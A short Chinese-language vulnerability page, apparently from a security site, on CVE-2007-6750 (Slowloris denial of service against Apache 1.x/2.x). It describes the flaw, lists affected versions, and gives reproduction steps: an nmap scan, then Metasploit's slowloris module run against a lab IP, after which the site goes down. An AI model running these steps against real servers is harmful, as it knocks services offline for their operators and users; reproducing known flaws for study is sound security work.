CVE-2007-6750 Apache ddos
一、漏洞简介
Apache HTTP 服务器 1.x 和 2.x 允许远程攻击者通过部分 HTTP 请求导致拒绝服务(守护进程中断),如 Slowloris 所示,这与 2.2.15 之前版本中缺少 mod_ReqTimeout 模块有关
二、漏洞影响
Apache 1.x/2.x
三、复现过程
nmap -sV -p80 192.168.146.175 (用 nmap 查看 Apache 版本)(Apache2.2.3 初步断定存在漏洞)
接着访问网站查看是否正常(发现网站正常)
msfconsole (启动 metasploit)
use auxiliary/dos/http/slowloris (使用模块)
set RHOST 192.168.146.175 (设置目标 IP)
run (执行攻击)
再访问网站查看是否正常(发现网站瘫痪)
四、参考链接
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论